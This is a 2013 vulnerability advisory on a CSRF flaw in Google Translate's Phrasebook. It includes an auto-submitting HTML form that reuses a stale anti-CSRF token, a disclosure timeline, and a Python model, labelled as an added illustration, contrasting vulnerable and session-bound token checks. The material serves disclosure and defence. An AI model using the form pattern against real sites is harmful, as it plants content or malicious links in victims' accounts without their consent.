
Google Translate Cross Site Request Forgery

Posted on 22 June 2013

+------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Google Translate CSRF Vulnerability
# Date : 06/20/2013
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Affected Web site : http://translate.google.com
# Original Advisory : http://www.webapp-security.com/2013/06/translate-google-com-csrf-vulnerability/
+------------------------------------------------------------------------------------------------------------------------------------------+

Summary
1) Vulnerability Description
2) Exploit
3) Vulnerability Timeline

+------------------------------------------------------------------------------------------------------------------------------------------+

1) Vulnerability Description

I discovered a new CSRF vulnerability on the translate.google.com web site which could allow an attacker to insert items (words, phrases or URLs and their translations) into the user's Phrasebook. Furthermore, an attacker could insert potentially malicious URLs into that Phrasebook; the victim would then be redirected to them simply by clicking the "Go to <website>" right-click option on translate.google.com.

The vulnerability is caused by a problem in the generation of the "xt" anti-CSRF token, which is not correctly bound to the user's session: any previously generated anti-CSRF token for that specific user can be reused to carry out this attack.
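The token-binding defect described above can be shown with a small Python model. This is an added illustration, not Google's code (the real "xt" implementation is not public); the server key, session identifiers, token lifetime and user name are all assumed for the example. The vulnerable checker accepts any token ever issued to the user regardless of the session that presents it, which is the behaviour the advisory reports; the hardened checker HMACs the token over user, session and issue time, so a token obtained in one session cannot be replayed from another and expires after a bounded time.

```python
import hashlib
import hmac
import time

# Assumed server-side secret; a real deployment would load this from a secret store.
SERVER_KEY = b"hypothetical-server-secret-change-me"

# ---- Vulnerable model: token recorded per user only (mirrors the advisory) ----
issued_tokens = {}  # user -> set of tokens ever issued to that user


def issue_token_vuln(user):
    """Issue a random token and remember it for the user (not for the session)."""
    import secrets
    tok = secrets.token_hex(16)
    issued_tokens.setdefault(user, set()).add(tok)
    return tok


def verify_token_vuln(user, session_id, tok):
    """Defect: session_id is never consulted, so any old token for the user passes."""
    return tok in issued_tokens.get(user, set())


# ---- Hardened model: token bound to user AND session, with a lifetime ----
def _mac(user, session_id, ts):
    msg = f"{user}|{session_id}|{ts}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token_fixed(user, session_id, now=None):
    """Token = issue-timestamp ':' HMAC(user, session, timestamp)."""
    ts = int(now if now is not None else time.time())
    return f"{ts}:{_mac(user, session_id, ts)}"


def verify_token_fixed(user, session_id, tok, max_age=3600, now=None):
    """Accept only a token minted for this user+session within max_age seconds."""
    try:
        ts_str, mac = tok.split(":", 1)
        ts = int(ts_str)
    except ValueError:
        return False
    current = int(now if now is not None else time.time())
    if not (0 <= current - ts <= max_age):  # rejects expired and future-dated tokens
        return False
    # Constant-time comparison avoids leaking the MAC byte by byte.
    return hmac.compare_digest(mac, _mac(user, session_id, ts))


def demo():
    """Replay a token from an old session against a new one under both models."""
    user = "victim@example.com"          # assumed user
    old_session, new_session = "sess-old", "sess-new"  # assumed session ids

    old_tok = issue_token_vuln(user)
    replay_vuln = verify_token_vuln(user, new_session, old_tok)   # True: replay works

    old_fixed = issue_token_fixed(user, old_session, now=1000)
    replay_fixed = verify_token_fixed(user, new_session, old_fixed, now=1000)  # False
    legit_fixed = verify_token_fixed(user, old_session, old_fixed, now=1000)   # True
    return replay_vuln, replay_fixed, legit_fixed


if __name__ == "__main__":
    print(demo())
```

The usual companion checks for a state-changing endpoint like this one (verifying the Origin or Referer header, and not honouring a token carried in the query string of a URL the attacker controls) are not described in the advisory and are left out of the model.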
2) Exploit

The following simple exploit inserts, into a Phrasebook, the new phrase "word_example" with the URL "www.ivanobinetti.com" (my blog) as its translation. The page auto-submits a cross-site POST to the Phrasebook endpoint; the placeholder in the "xt" parameter must be replaced with a previously generated anti-CSRF token for the victim:

<html>
<body onload="javascript:document.forms[0].submit()">
<!-- cross-site POST to the Phrasebook "sg" endpoint; xt carries the reused anti-CSRF token -->
<form method="POST" name="form0" action="http://translate.google.com/translate_a/sg?client=t&cm=a&sl=en&tl=it&ql=4&hl=en&xt=<anti-CSRF token>">
<!-- q: the phrase to add; utrans: its "translation", here a URL -->
<input type="hidden" name="q" value="word_example"/>
<input type="hidden" name="utrans" value="www.ivanobinetti.com"/>
</form>
</body>
</html>

Note: when the exploit runs, the victim is prompted to open or download an "sg" file. Even if the victim neither opens nor downloads this file, the new item is added to the Phrasebook.

3) Vulnerability Timeline

04/12/2013: Exploit sent to the Google security team (security@google.com)
04/12/2013: First prompt reply from the Google security team telling me that the exploit does not work
04/12/2013: My reply explaining the details of the vulnerability and the related exploit
04/13/2013: The Google security team contacted me admitting the vulnerability and saying that they were considering whether to assign me a reward
04/17/2013: The Google security team told me that the vulnerability/problem was already known to Google and that there would be no reward for me :(
06/20/2013: After more than 2 months I checked that the problem is still in place, so I decided to publish the vulnerability
